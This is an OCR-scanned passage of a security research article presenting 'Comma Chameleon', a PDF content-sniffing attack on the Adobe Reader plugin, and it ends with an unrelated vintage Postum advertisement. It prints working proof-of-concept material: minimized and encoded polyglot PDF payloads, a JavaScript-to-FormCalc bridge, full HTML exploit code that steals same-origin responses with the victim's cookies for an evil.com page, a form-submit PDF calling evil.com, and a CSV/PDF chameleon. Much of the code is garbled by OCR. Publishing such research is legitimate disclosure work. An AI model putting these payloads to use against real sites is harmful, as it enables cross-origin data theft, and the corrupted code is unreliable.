protection mechanisms, such as the trust zones 
in IE. Web servers also have become much 
better at properly specifying the MIME type 
of resources. Additionally, secure HTTP re- 
sponse headers!? are often used to instruct the 
user-agent not to perform MIME sniffing on 
a resource. It’s now a de facto standard to 
use Content-Type-Disposition: attachment, 
X-Content-Type-Options: nosniff and a be- 
nign Content-Type whenever the response is totally 
user-controlled (e.g., im file hosting applications). 





10Chris Evans, Generic Cross-browser Cross-domain Theft 


That has improved the situation quite a bit, but 
there were still some leftovers from the nineties that 
allowed for MIME sniffing exploitation: namely, the 
browser plugins. 


4.2 Plugin Content Sniffing 


When an HTML page embeds plugin content, it 
must explicitly specify the file type (SWF, PDF, 
etc.), then the browser must instantiate the given 
plugin type regardless of the MIME type returned 
by the server for the given resource.!ê 


Some of those plugins ignore the response head- 
ers received when fetching the file and render 
the content inline despite Content-Disposition: 
attachment and X-Content-Type-Options: 
nosniff. For plugins that render active content 
(e.g, Flash, Silverlight, PDF, etc.) this makes it 
possible to read and exfiltrate the content from the 
hosting domain over HTTP. If the plugin's content 
is controlled by an attacker and runs in the context 
of a domain it was served from, this is essentially 
equivalent to XSS, as sensitive content like CSRF 
tokens can be retrieved in a session-riding fashion. 


This has led to another class of content sniffing 
attacks based on plugins. Rosetta Flash!415 was a 
great example of this: making a JSONP API re- 
sponse look like a Flash file, so that the attacker- 
controlled Flash file can run with the target do- 
main's privileges. 

'To demonstrate this, let's see an example attack 
site for a vulnerable JSONP API that embeds the 
given query string parameter in the response body 
without modification: 











«object 

type="application /x—shockwave—flash" 

data="http://example.com/jsonp_api?callback= 
CWS[ flash file contents ]"> 





lFiledescriptor, Cross-origin CSS Attacks Revisited (feat. UTF-16) 


120WASP, Secure Headers Project 
ISHTML5 Standard 
!4Michele Spagnuolo, Abusing JSONP with Rosetta Flash 


15Gábor Molnar, Bypassing Same Origin Policy With JSONP APIs and Flash 
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In this case, the API response would look as be- 
low and would be interpreted as Flash content if the 
response doesn't match some constraints introduced 
as a mitigation for the Rosetta Flash vulnerability 
(we won't discuss those in detail here): 








OWS[flash file contents] ({"some":"JSON", " 
returned":"by", "the":"API"}) 








Since Flash usually ignores any trailing junk 
bytes after the Flash file body, this would be run as a 
valid SWF file hosted on the example. com domain. 
The payload SWF file would be able to issue HTTP 
requests to example. com, read the response (for ex- 
ample, the actual data returned by the very same 
HTTP API, potentially containing some sensitive 
user data), and then exfiltrate it to some attacker- 
controlled server. 

Instead of Flash, our research focuses on PDF 
files and methods to make various types of web con- 
tent look like valid PDF content. PDF files, when 
opened in the browser with the Adobe Reader plu- 
gin, are able to issue HT'TP requests just like Flash. 
The plugin also ignores the response headers when 
rendering the PDF; the main challenge is how to 
prepare a PDF payload that is immune to leading 
and trailing junk bytes, and minimal in file size and 
character set size. 

We must mention that our research is specific to 
Adobe Reader: other PDF plugins usually display 
PDFs as passive content without the ability to send 
HTTP requests and execute JavaScript in them. 


4.3 Comma Chameleon 


The existing PoC payloads for PDF-based content 
sniffing!6 17 used a FormCalc technique to read and 
exfiltrate the content. Although they worked, we 
quickly noticed that their practicability is limited. 
They were long (e.g. Qirsdl uses > 11 kilobytes)!? 
and used large character sets. Servers often rejected, 
trimmed, or transformed the PDF by escaping some 
of the characters, destroying the chain at the PDF 
parser level. Additionally, those PoCs would not 
work when some data was prepended or appended 
to the injected PDF. We wanted a small payload, 
with a limited character set and arbitrary prefix and 
suffix. 





[zs 


5 


7 
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These are important aspects because most in- 
jection contexts where the attack is useful are very 
limiting. For example, when injecting into a string 
in a JSON file, junk bytes surround the injection 
point, as well as the JSON format limitations on the 
character set (e.g., encoding quotes and newlines). 

Additionally, we wanted to come up with a uni- 
versal payload—one that does not need to be altered 
for a given endpoint and can be injected in a fire- 
and-forget manner—thus no hardcoded URLs, etc. 

And thus, the quest for the Comma Chameleon 
has started! Why such a name? Read on! 


4.3.1 Minimizing the Payload 


To keep the PDF as small as possible, we made it 
contain only the bootstrap code and injected all the 
rest of the content in an external HTML page from 
the attacker's origin. Size of the final code then 
doesn't matter, and we could focus only on min- 
imizing the ‘dropper’ PDF. This required altering 
the PDF structure at various layers. Let's look at 
them one by one. 


The PDF layer It turns out that for the working 
scriptable FormCalc PDF we only need 2 objects. 


1. A document catalog, pointing to the 
pages (/Pages) and the interactive form 
(/AcroForm) with its XFA (XML Forms Ar- 
chitecture). There needs to be an OpenAc- 
tion dictionary containing the bootstrapping 
JavaScript code. The /Pages element may be 
empty if the document's first page will not be 
displayed. 


2. À stream with the XDP document with the 
event scripts. 


Here's an example: 








YPDF—1.1 


1 0 obj 
<< /Pages << >> 
/AcroForm << /XFA 2 0 R >> 
/OpenAction << 
/S /JavaScript 
/JS((code here}) 
>> 
>> 
endobj 


16 Alex Inführ @insertscript, PoC for the FormCalc content exfiltration 


TT. 


18 Soroush Dalili, JS-instrumented content exfiltration PoC 
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unzip pocorgtfoi2.pdf CommaChameleon/CrossSiteContentHijacking 
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2 0 obj 
<< /Length xxx 
>> 
stream 
{xdp content here} 
endstream 
endobj 





Additionally, a valid PDF trailer is needed, spec- 
ifying object offsets in an xref section and a pointer 
to the /Root element. 








xref 

0 3 
0000000000 
0000000007 
0000000047 
trailer 

<< /Root 1 0 R >> 
startxref {xref offset here} %%EOF 


65535 f 
00000 n 
00000 n 








Further on, the PDF header can be shortened 
and modified to avoid detection; e.g., instead of 
PDF-1.1<newline>, one can use %PDF-Q<space> 
(we avoid null bytes to keep the character set small). 
Similarly, most of the whitespace is unnecessary. For 
example, this is valid: 








obj<</Pages 2 0 R/AcroForm<</XFA 3 0 R>>/ 
— OpenAction<</S/JavaScript/JS(code;)>>>> 
— endobj 








The xref section needs to contain entries for 
each of the objects and is rather large (the overhead 
is 20 bytes per object); fortunately, non-stream ob- 
jects can be inlined and moved to the trailer. The 
final example of a minimized PDF looks like this: 








IPDEQ 1 0 obj<</Length 1>>stream 

{xdp here) endstream endobj xref 0 2 

— 0000000000 65535 f 0000000007 00000 n 
— trailer <</Root<</AcroForm<</XFA 1 0 R>>/ 
— Pages<<>>/OpenAction<</S/JavaScript/JS( 
— code)>>>>>> startxref {xref offset here} 
— EOF 
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The JavaScript bootstrap code As JavaScript- 
based vectors to read HTTP responses from 
the PDF's origin without user confirmation were 
patched by Adobe, FormCalc currently remains the 
most convenient way to achieve this. Unfortunately 
it cannot be called directly from the embedding 
HTML document, and a JavaScript bridge is nec- 
essary. In order to script the PDF to enable data 
exfiltration, we then need these two bridges: 


1. HTML 5 PDF JavaScript 
2. PDF JavaScript —> FormCalc 


The first bridge is widely known and docu- 
mented.!º 








this. disclosed = true; 
if (this.external && this.hostContainer) { 
function onMessageFunc(stringArray) { 
try { 
// do stuff 


catch (e) { 

j 
} 
function onErrorFunc(e) { 

console .show() ; 

console. println(e. toString ()); 
} 
try { 

this. hostContainer.messageHand 
new Object(); 

this. hostContainer.messageHand 
myPDF — this; 

this. hostContainer.messageHand 


onMessage — onMessageFunc; 
this. hostContainer.messageHandler 
onError — onErrorFunc; 





this. hostContainer.messageHand 
onDisclose function () { 
return true; 
h 


} 

catch (e) { 
onErrorFunc(e) ; 

} 





This works, but it’s huge. Fortunately, it 
is possible to shorten it a lot. For example 
this.disclosed = true is not needed, and neither 
are most of the properties of the messageHandler. 
Neither is ‘this’ - hostContainer is visible in 
the default scope. In the end we only need 
a messageHandler.onMessage function to pro- 
cess messages from the HTML document and a 


19 Adobe, Cross-scripting PDF content in an Adobe AIR application 


20 Adobe, JavaScript for Acrobat API Reference 
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messageHandler.onDisclose function. From the 
documentation:?? 
onDisclose — A required method 


that is called to determine whether the 
host application is permitted to send 
messages to the document. This allows 
the PDF document author to control the 
conditions under which messaging can 
occur for security reasons. [..] The 
method is passed two parameters cURL 
and cDocumentURL [..] If the method 
returns true, the host container is per- 
mitted to post messages to the message 
handler. 


For our purposes we need a function reference 
that, when called returns true—or a 'truth-y' value 
(this is JavaScript, after all!). To save characters, 
how about a Date constructor? 








> !!Date(’http://url’, 
true 


“http://documentUrl”) 








In the end, the shortened JS payload is just: 








hostContainer .messageHandler={onDisclose: 
Date, onMessage: function (a) (eval(a[0]) }}) 








Phew! The whole embedding HTML page can now 
use object.postMessage to deliver the 2"4 stage 
PDF JavaScript code. We’re looking forward to 
Adobe Reader supporting ES5 arrow functions as 
that will shorten the payload even more. 








2lunzip pocorgtfoi2.pdf CommaChameleon/xfa.zip 


The XDP In his PoC,?! QinsertScript proposed 
the following payload for the XDP with a hardcoded 
URL (some wrapping XDP structure has been re- 
moved here and below for simplicity): 








<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/ 
" 
p ENSE 
«field id="Hello World! "> 


<event activity="initialize"> 
<script content Type—-'application/x 
—formcalc'- 

Post("http://sameOrigin.com/ 
index.html" , "YOUR POST DATA" ,"text / plain 
"S"utf—8","Content—Type: Dolphin&#x0d;&# 
x0a; Test: AAA") 

</script> 
</event> 
</field> ... 
</xdp : xdp> 





It turns out we don't need the <field>, as we 
can create those dynamically from JavaScript (see 
next paragraph). Events can also be triggered dy- 
namically, so we don't need to rely on initialize 
and can instead pick an event with the shortest 
name, exit. We also define the default XML names- 
pace and lose the contentType attribute (FormCalc 
is a default value). With these optimizations we're 
down to: 








<xdp xmlns="http://ns.adobe.com/xdp/"> ... < 
event activity=’exit '><script >{{code 
here}}</script ></event> ... </xdp> 





JavaScript —  Formcalc bridge In Adobe 
Reader it is possible for JavaScript to call Form- 
Calc functions.?? This was used by Qirsdl to create 
the PoC for the data exfiltration.!? 

The communication relies on using the form 
fields in the XDP to store input parameters and out- 
put value, and triggering the events that would run 
the FormCalc scripts. This, again, requires a long 
XML payload. 

Or does it? Fortunately, the form fields can be 
created dynamically by JavaScript and don't need 
to be defined in the XML. Additionally, FormCalc 
has the Eval O) function — perfect for our purposes. 


?? John Brinkman, Calling FormCalc Functions From JavaScript 
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In the end, the JavaScript function (injected 
from the HTML) to initialize the bridge is: 








function initXfa() { 
if (xfa.form.s) { 


// refers to <subform name='s'> 
s = xfa.form.s; 
} 
//if uninitialized 
if (s && s. variables.nodes.length — 0) { 
// input parameter 
S.P = xfa.form.createNode("text", "P"); 
// return value 
s.R = xfa.form.createNode("text", "r"); 
s.variables.nodes.append(s.P); 
s.variables.nodes.append(s.R); 
// JS—-FormCalc proxy 
s.doEval — function(a) ( 
s.P.value — a; 
s.execEvent ("exit"); 
return s.R. value; 
>; 
} 
} 
app.doc.hostContainer.messageHandler. 


onMessage 
try{ 
var cmd = params [0]; 
var result = ""; 
switch (cmd) { 
case 'eval': // eval in JS 
result eval(params[1]) ; 
break; 
case "get": 
// send Get through FormCalc 
initXfa(); 
result — s.doEval( 
'"Get(" + params[1] + ’)’); 
break; 


function (params) { 


app.doc. hostContainer . postMessage( 
[’ok’,result |); 
} catch(e) { 
app.doc. hostContainer . post Message ( 
[ error ',e.message]) ; 








And the relevant FormCalc event script is simply 
r=Eval (P). 

Now we have a simple way to get the same-origin 
HTTP response from the embedding page’s JS like 
this: 








console. 


object .messageHandler .onMessage 
log. bind (console); 


object. postMessage ([ get”, url]); 
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Similarly, we can evaluate arbitrary JavaScript 
or FormCalc code by extending the protocol in the 
JS code — all without modifying the PDF. 


4.3.2 The Final Payload 


The final PDF payload for the Comma Chameleon 
can be presented in various versions. The first one 
is: 








GPDE-Q 1 0 obj<</Length 1>>stream 

<xdp xmlns="http://ns.adobe.com/xdp/">< 

— config><present><pdf><interactive >1</ 
interactive ></pdf></present ></config >< 
template><subform name="s"><pageSet/>< 
event activity="exit "><script >r=Eval (P) «/ 
script ></event ></subform></template ></xdp 
> endstream endobj xref 0 2 0000000000 
65535 f 0000000007 00000 n trailer <</ 
Root<</AcroForm<</XFA 1 0 R>>/Pages<<>>/ 
OpenActionc«c/S/ JavaScript /JS( 
hostContainer.messageHandler—(onDisclose: 
Date, onMessage: function (a) (eval(a[0]) }}) 
>>>>>> startxref 286 %/EOF 


A 214 





It's 522 bytes long, using the character set con- 
sisting of a space, newline, alphanumerics, and 
O[[96-,/.:—«". The only newline character is re- 
quired after the stream keyword, and double quote 
characters can be replaced with single quotes if 
needed. 

The second version utilizes compression and 
ASCII stream encoding in order to reduce the char- 
acter set (at the expense of size). 








YPDF-Q 1 0 obj<</Filter [/ ASCIIHexDecode/ 

<> FlateDecode]/ Length 322>>stream 
789c4d8f490ec2300c45af527553d8d4628b9cecd823 
718234714ba4665062aa727b4c558695a7ff9f6d 
5c5d6ed630c7aaba3b733e03c4dalb9706ea6d0a 
2063e834da14473f69cc852a4596c48d1a7d642a 
c6b25f489f10fe4b844d015f037c104c21cf8645 
521fc3984a68a209a4dada0ad54c7423068db488 
abd9609e9faaa3d5b3dc516df199755197c5cc87 
eb1161ef206c0e893b55b2dfa6f71bfa05c67b53 
ec> endstream endobj xref O 2 0000000000 
65535 f 0000000007 00000 n trailer <</ 
Root<</AcroForm<</XFA 1 0 R>>/Pages<<>>/ 
OpenAction<</S/JavaScript/JS<686f7374436f 
6e7461696e65722e6d65737361676548616e646c 
65723d7b6f6e446973636c6f73653a446174652c 
6f6e4d6573736167653a66756e6374696f6e2861 
297b6576616c28615b305d297dTd>>>>>>> 
startxref 416 %EOF 


A apr ale Dra, 











It's now 732 bytes long, but with a much more 
injection-friendly character set: space, alphanums, 
one newline, and []<>/-%. The complete HTML 
page to initialize the PDF and instrument the data 
exfiltration is quite straightforward, shown in Fig- 
ure 4. 

To start, the runCommaChameleon needs to be 
called with the PDF URL and the URL to exfil- 
trate. (Both URLs should be from the victim's ori- 
gin.) The whole chain looks like this: 


1. Victim browses to //evil.com. 

2. //evilcom HTML loads the PDF from / /vic- 
tim.com into an <object> tag, starting Adobe 
Reader. 

3. The PDF /OpenAction calls back to the 
HTML with its URL. 

4. The full code from “code” is sent to the PDF 
and is eval-ed by its JavaScript message han- 
dler, creating a bridge to FormCalc. 

5. HTML sends a URL load 
(/ /victim.com/any-url) to PDF. 

6. FormCalc loads the URL (the browser happily 
attaches cookies). 


instruction 


T. HTML page gets the response back. 

8. //evilcom, having completed the cross- 
domain content exfiltration, smiles and fin- 
ishes his piña-colada. Fade to black, close cur- 
tain. 


Just for fun, window.ev and window.formcalc are 
also exposed, giving you shells in respectively PDF 
JavaScript and its FormCalc engine. Enjoy! 

'The full PoC is embedded in this PDF.?? 


4.3.3 Embedding into Other File Formats 


'The curious reader might notice that, even though 
they made a thirty-two second long effort to skip 
through most of this gargantuan writeup and even 
spotted the PoC section before, there's still no 
clue as to why the whole thing is named “Comma 
Chameleon." As with all current security research, 
the name is by far the most important part (it's not 
the nineties anymore!), so now we need to unfold 
this mystery! 

PDF makes for an interesting target to exploit 
plugin-based content sniffing, because the payload 
does not need to cover the whole HTTP response 





23unzip pocorgtfo12.pdf CommaChameleon 
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from a target service. It’s possible to construct a 
PDF even if there’s both a prefix and a suffix in the 
response—the injection point doesn’t need to start 
at byte 0, like in Rosetta Flash. 

Our payload however allows for even more—it’s 
possible to split it into multiple chunks and inter- 
leave it with uncontrolled data. For example: 








{{Arbitrary prefix here}} 

YPDF-Q 1 0 obj endobj xref 
aS 

{{Arbitrary content here}} 

startxref XXX %/EOF 

{{Arbitrary suffix here}} 


trailer< 





The only requirement is for the combined length 
of the prefix and suffix to be under 1,000 bytes—all 
of that without needing to modify the payload and 
recalculate the offsets. 

Due to the small character set, the payload can 
survive multiple encoding schemes used in various 
file formats. Additionally, the PDF format itself al- 
lows one to neutralize the content in various ways. 
This makes our payload great for applications host- 
ing various file types. Let's take, for example, a 
CSV. To exploit the vulnerability, the attacker only 
needs to control the first and the last columns over 
two consecutive rows, like this: 








artist ,album, year 

David Bowie, David Bowie ,1969 

Culture Club, Colour by Numbers,%PDF-Q 1 0 
obj <<...>>stream 

78...ec> endstream endobj %,, xref 

Madonna, Like a Virgin ,1985 


. 9OAEOF 





This ASCII encoded version uses neutral- 
ized comma characters and is a straightforward 
PDF/CSV chameleon, thus proving both the use- 
fulness of this payload, and that we're really bad at 
naming things. 


4.3.4 Browser Support 


Comma Chameleon, just like other payloads used for 
MIME sniffing, demonstrates that user-controlled 
content should not be served from a sensitive ori- 
gin. This one, however is based on Adobe Reader 
browser plugin and only works on browsers that sup- 
port it—that excludes Chromium-based browsers.?* 
MSIE employs a quirky mitigation: rendered PDF 








N 








<style type="text/css"> 


object { 
border: 5px solid red; 
width: 5px; /x* make it too small for the first page to display to 
avoid triggering errors in the PDF «/ 
height: 5px; 
} 
</style> 
<!—— this code will be injected into PDF —> 
<script id="code" type="text /template"> 


function initXfa() { 
if (xfa.form.s) { 


s = xfa.form.s; 

if (s && s.variables.nodes.length — 0) { 
s.P = xfa.form.createNode("text", "P"); 
s.R = xfa.form.createNode("text", "r"); 


s.variables.nodes.append(s.P); 
s.variables.nodes.append(s.R); 
s.doGet = function (url) { 
s.P. value = "Get(\"" + url + "\")"; 
s.execEvent ("enter"); 
s.execEvent ("exit"); 
return s.R.value; 
h 
s.doEval — function(a) ( 
s.P.value — a; 
s.execEvent("enter"); 
s.execEvent ("exit"); 
return s.R. value; 
>; 
} 
} 








app.doc. hostContainer. messageHandler. onMessage = function (params) { 
try{ 
var cmd = params [0]; 
var result = ""; 
switch (cmd) { 
case 'eval”: 
result = eval(params[1]) ; 
break; 
case "get": 
initXfa(); 
result = s.doGet(params[1]) ; 
break; 
case "formcalc': 
initXfa(); 
result = s.doEval(params[1]) ; 
break; 
default: 
throw new Error('Unknown command”); 
} 
app.doc. hostContainer. postMessage ([’ok’,result]) ; 
} catch(e) { 
app. doc. hostContainer. postMessage (| ’ error’ , e. message |); 
h 


app.doc.hostContainer.postMessage([1,app.doc.URL]); // report readiness 
</script> 





Figure 4 - HTML to init PDF and exiltrate data. Continued in Figure 5. 
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<script type="text/javascript"> 
function runCommaChameleon(pdfUrl, urlToExfiltrate) { 


var object = document. createElement ("object"); 
(function (object) ( 
var req = false; 
var onload = function () { 
var dropInterval; 
object. messageHandler = { 
onMessage: function(m) ( 
if (m[0] = 1) { 


// PDF phoned home. 
console.log(’PDF init ok:’, m[1]) ; 
clearInterval(dropInterval); 


if (!req) | 
req = true; 
// make the URL absolute 
var a = document.createElement( 'a"); 
a.href — urlToExfiltrate; 
console.log('requesting ' + a.href); 


object .postMessage (| get”, a.href]) ; 
// Adding new cool functions. 
window.ev = function(c) { 

object. postMessage([’eval’, c]); 
E 


window.formcalc = function(c) { 
object. postMessage([’formcalc’, cl); 


h 
} 
} else { 


if (m[0] = ’ok’) { 
alert (m[1]) ; 


console. log (m[0], m[1]); 
j 
ds 


onError: function(m, mm) ( 
console.error(" error: " + m. message) ; 
j 


b 


// Keep injecting the code into PDF 


dropInterval = setInterval(function() { 
object . post Message ([document.getElementById( code") .textContent]) ; 
}, 500); 


$; 
setTimeout(onload, 1000); 
}) (object); 


object.data = pdfUrl; 
console.log("Loading " + object. data); 
object.type = "application/pdf"; 
document. body. appendChild (object); 


} 


</script> 





Figure 5 — Continued from Figure 4. 
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files are served from a file:// origin upon content- 
type mismatch, breaking the chain. Exploitation 
in Firefox is possible, but has limited practicability 
because of the default click-to-play settings.2? As 
far as we can tell, Safari remains the most attrac- 
tive target. Comma Chameleon, while quite inter- 
esting, remains impractical until Adobe decides to 
conquer the browser market with its non-NPAPI- 
based browser plugin. We are looking forward to 
that. 


4.4 The Quest for the One-line PDF 


Comma Chameleon uses a relatively small set of 
characters, however, there is still one that prevents it 
from being useful in numerous injection contexts. It 
is the literal newline, since many injection contexts 
do not allow literal newlines to appear: for example, 
a string inside a JSON API response, a single field 
in a CSV file (as opposed to when multiple fields are 
controlled), CSS strings, etc. 

The perfect PDF injection payload would be a 
one line PDF that is still able to: issue HTTP re- 
quests, read the response, and exfiltrate the data. 
Since JSON API responses contain partially user- 
controlled data in many cases, and a large portion 
of them only escape characters that are absolutely 
necessary to escape (like newlines), a one-line PDF 
would suddenly make a huge number of APIs vul- 
nerable, even more than the Rosetta Flash vulnera- 
bility. 

As it turns out, constructing such a PDF is hard. 
'The reason for this is that newlines play a crucial 
role in the PDF file structure: the PDF header has 
to be followed by a newline, and every stream must 
be defined by a ‘stream’ keyword followed by a new- 
line and then the data. 

As described in previous sections, the newline in 
the header can be omitted when there's a valid xref 
and a trailer. However, there is no known way to 
define stream objects without newlines. 

We have partially overcome this problem. We'll 
present our solutions and the dead ends we've ex- 
plored in the next few sections, to give other re- 
searchers a solid foundation to start on. 


4.4.1 Referencing an External Flash File 


External Flash files can be referenced without using 
stream objects. However, they are run within the 
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context of their hosting domain, which means that 
they are not useful for our purposes. 


4.4.2 Executing JavaScript 


For executing JS code, we don’t need a stream ob- 
ject. When we combine this fact with the trick to 
avoid the newline after the PDF header with a valid 
xref, we arrive to this one line PDF file: 








YPDF-Q xref 0 0 trailer <</Root<</Pages<<>>/ 
— OpenAction<</S/ JavaScript /JS<6170702 

=> e616c6572742855524c29>>>>>>> startxref 
=> TYREOF 





This PDF is immune to leading and trailing junk 
bytes, opens without any warning popup in Adobe 
Reader, and opens an alert window with the doc- 
ument's URL from JavaScript. Note that there's 
necessary space character after the EOF sign. 


/ 


nil 
y 


li 


Ig 
B 
L 
E 
i 
i 
E« 
5 


Z 








Now the logical next step would be to find an 
Adobe Reader JavaScript API that allows us to is- 
sue HTTP requests. Unfortunately, all of the docu- 
mented APIs that would allow reading the response 
require the user's consent. 


4.4.3 Dynamically Creating an Embedded 
Flash File from JavaScript 


Without a direct HTTP API, we are left with two 
options: to dynamically create either an embedded 
Flash file or a form with FormCalc. After read- 
ing through the Adobe JS API reference? a few 
times, we determined that creating a form dynami- 
cally is not possible, at least not in any documented 
way. On the other hand, it seemed like dynamically 
adding an embedded Flash object may be possible. 

This technique is made possible by an API that 
allows the JS to manipulate a 3D scene. One of the 
possible modifications is adding a texture to a sur- 
face. The texture can be an image, or even a video. 
In the case of video, Flash “movies” are also sup- 
ported. At this point, you might wonder why Adobe 
implemented rendering embedded Flash movies in a 
3D scene in a PDF file displayed in a browser. It's 
something we'd also like to know, but now let's con- 
tinue exploring the potential and limitations of this 
feature. 

The data for the Flash movie needs to be spec- 
ified as a Data object (in this case, that means a 
JavaScript object of type Data, not a PDF object). 
Data objects represent a buffer of arbitrary binary 
data. These objects can be obtained from file at- 
tachments, but to have file attachments, we need 
streams again—so that's not an option. Another way 
to create a Data object is the createData0bject 
API. But according to the reference, this function 
can be called only by signed PDFs with file attach- 
ment “usage rights,” or when opening the PDF in 
Adobe Pro. The only way to sign a PDF and add file 
attachment usage right is using Adobe's LiveCycle 
Reader Extensions product. As we're life-long sup- 
porters of the free software movement, we ruled out 
paying for a signature, and limiting the payload to 
Adobe Pro users is a very tight constraint we didn't 
want to add. 

Next, we found a way to dynamically create Data 
objects in Adobe Reader without a signature, but 
also came to the conclusion that creating a 3D scene 





requires newlines regardless. This is because there's 
no way to define them without at least one stream 
object, and stream objects cannot be defined with- 
out newlines. 

After this dead end, we tried to find other ways 
to dynamically add content to a displayed PDF. One 
of the results of this search is Forms Data Format 
(FDF). 


4.4.4 Using Forms Data Format to Load Ad- 
ditional Content 


FDF? and its XML based version, XML Forms 
Data Format (XFDF)” are a file format and a re- 
lated technology, that are meant to enable rich PDF 
forms to send the contents of a PDF form to a re- 
mote server and to update the appearance of the 
PDF based on the server's response. For our pur- 
poses, the important part is updating the PDF. This 
could enable us to implement a minimal form sub- 
mission logic in the payload PDF. That logic would 
submit the form to the attacker server without any 
data and then augment the payload PDF using the 
server's response. The update received from the 
server would add embedded Flash, 3D scene, or 
FormCalc code to the PDF, which would then carry 
out the rest of the work. 

The first step is having a first stage PDF that 
submits the form. Fortunately, this can be achieved 
without user interaction in a really compact way, 
without even using JavaScript: 








YPDF-1.7 1 0 obj<</Pages 1 0 R/OpenAction<</ 
— S/SubmitForm/F(http: //evil.com/z.fdfZFDF) 
— »»»»endobjzref 0 2 0000000000 65535 f 

— 0000000009 00000 n trailer <</Root 1 0 R 
— >> startzref 98 %%EOF 





As a security check,?? Adobe Reader will down- 
load the evil.com/crossdomain.xml file, which is a 
essentially a whitelist of domains, and check whether 
the submitting PDF's domain is in the whitelist. 
'This is not a problem, since this file is controlled 
by us, and we can add the victim's domain in the 
whitelist. Also, there's an additional constraint: 
the Content-Type of the response must be exactly 
application/vnd.fdf. 

According to the documentation, FDF supports 
the augmentation of the original PDF in many dif- 
ferent ways: 


26 Adobe, Portable Document Format ISO standard, Section 12.7.7 


27 Adobe, XML Forms Data Format Specification 
28 Adobe, Acrobat Application Security Guide, 4.5.1 
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e Updating existing form fields 
e Adding new pages 

e Adding new annotations 

e Adding new JavaScript code 


At a first glance, this feature set looks more than suf- 
ficient to achieve our goal. Adding new JavaScript 
code is the easiest. The required FDF file looks like 
this: 








%EDF—1.2 

1 0 obj 

<< /FDF << /JavaScript << /Doc [ 
alert (42);)] >> >> >> 

endobj 

trailer 

<< /Root 1 0 R >> 

Z/EOF 


O (app. 








However, adding new JS code to the document is 
not really useful, since we already have JS execu- 
tion with a one line PDF. 

Adding new pages seems useful, but it turns out 
that this only adds the page itself, not the additional 
annotations attached to the page, like Flash or 3D 
scenes. Also, XFA forms with FormCalc are not de- 
fined inside pages, but at the document level, so the 
ability to add pages doesn't mean that we can add 
pages with forms in them. 

The situations with updating existing form fields 
is similar: the only interesting part of that API is 
the ability to draw a page from an external PDF to 
an existing button as background. It has the same 
limitations as adding pages: only the actual page 
graphics will be imported, without annotations or 
forms. 

Adding annotations is the most promising, since 
Flash files, 3D scenes, attachments are all annota- 
tions. According to the documentation, there are 
unsupported annotation types, but Flash and 3D 
are not among them. In practice, however, they just 
don't work. The only interesting type of annotation 
that is possible to add is file attachments. 

File attachments are useful for two reasons. 
First, they provide references to their Data objects, 
which means that we now have a way to create these 
objects without a signature. Secondly, they might 
contain embedded PDF files. There are several dif- 
ferent ways to open an embedded PDF added with 
FDF, but the problem in this case is that the new 
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PDF is never loaded with the original PDF's secu- 
rity context. Instead, it's saved to a temporary file 
first and then opened outside the web browser. 


4.4.5 The End of the Road? 


The PDF file format has a huge set of features, es- 
pecially if we consider the JavaScript API, Form- 
Calc, XFDF, other companion specifications, and 
Adobe's proprietary extensions. Many of these fea- 
tures are under-specified, under-documented, and 
rarely used in practice, so that it's often impossi- 
ble to find a working example. In addition to that, 
PDF reader implementations (even Adobe's own Ac- 
robat Reader) often deviate from the specification in 
subtle ways. 

In the end, it's not really possible to have a com- 
plete picture of what PDF files can do. We believe 
that a one line payload is doable; we just didn't find 
a way to create one. We encourage others to take a 
look and share the results! 


4.5 Unexplored Areas 


So far our goal has been to construct a PDF that 
is able to read and exfiltrate data from the hosting 
domain through HT'TP requests. In this section, we 
will enumerate a few other interesting scenarios that 
we didn't explore in depth, but that may enable by- 
passing some other web security features with PDFs. 

If the goal is to exfiltrate just the document in 
which the injection occurs, then PDF forms might 
come handy. If there are two injection points, one 
could construct a PDF where the data between the 
injection points becomes the content of a form field. 
This form can then be submitted, and the content 
of the field can be read. When there is one injec- 
tion point, it's possible to set a flag on PDF forms 
that instructs the reader to submit the whole PDF 
file as is, which, in this case, includes the content to 
be exfiltrated. We weren't able to get this to work 
reliably, but with some additional work, this could 
be a viable technique. 

This technique might be usable in other PDF 
readers, like modern browsers” built-in PDF plug- 
ins. It would also be interesting to have a look at 
the API surface these PDF readers expose, but we 
didn't have the resources to have a deeper look into 
these yet. 

Content Security Policy is a protection mecha- 
nism that can be used to prevent turning an HTML 
injection into XSS, by limiting the set of scripts 


the page is allowed to run. In other words, when 
an effective CSP is in place, it is impossible to 
run attacker-provided JavaScript code in the HTML 
page, even if the attacker has partial control over the 
HTML code of the page through an injection. Adobe 
Reader ignores the CSP HTTP header and can be 
forced to interpret the page as PDF with embed- 
ded Flash or FormCalc. Note that in this scenario 
we assume that the injection is unconstrained when 
it comes to the character set, so there's no need to 
avoid newlines or other characters. This only works 
in HTML pages that don't have a «!doctype dec- 
laration, since that is included in Adobe Reader's 
blacklist of strings that can't appear before the PDF 
header in a PDF file. Adobe Reader simply refuses 
to display these files, so the applicability of this at- 
tack is very limited. 

Modern browsers block popups by default. This 
protection can be bypassed basically in all browsers 
running the Adobe Reader plugin by using the 
app.launchURL("URL", true) JavaScript API. 

Last, but not least, we've run into many Adobe 
Reader memory corruption errors during our re- 
search. This indicates that the features we've tested 
are not widely used and fuzzed, so they might be a 
good target for future fuzzing projects. 


4.5.1 Acknowledgments and Related Work 


No research is done in a vacuum; Comma 
Chameleon was only possible because of prior re- 
search, inspiration, and collaboration with others in 
the community. 

Using the PDF format for extracting same 
origin resources was first researched by Vladimir 
Vorontsov.?? Alex Inführ later presented various 
vulnerabilities in Adobe Reader.?? 

Vladimir and Alex demonstrated that PDF files 
could embed the scripts in the simple calculation 
language, FormCalc, to issue HTTP requests to 
same-origin URLs and read the responses. This re- 
quires no confirmation from the user and can be 





instrumented externally, so it was a natural fit for 
Rosetta Flash-style exploitation. 

Following Alex's proof of concept in 2015,!9 
Qirsdl demonstrated a way of instrumenting the 
FormCalc script from the embedding, attacker- 
controlled page.!? The abovementioned served as a 
starting point for the Comma Chameleon research. 

Comma Chameleon is part of a larger research 
initiative focused on modern MIME sniffing and as 
such was done with help of Claudio Criscione, Sebas- 
tian Lekies, Michele Spagnuolo, and Stephan Pfist- 
ner. 

Throughout the research, we've used multiple 
PDF parser quirks demonstrated by Ange Albertini 
in his Corkami project.?! 

We'd like to thank all of the above! 


Yes, thanks, 


I'm quite well. 


"Wouldn't know 
me? Well, I hardly 
know myself when 
I realize the superb 
comfort of well-bal- 


anced nerves and per- 
fect health.” 


“The change began 
when [| quit coffee 


and tea, and started drinking 


POSTUM 


"| don't give a rap about the theories; the com- 


fortable, healthy facts are sufficient." 


“There's a Reason” for Postum 


Canadian Postum Cereal Co., Ltd. 
Windsor, Ontario, Canada 


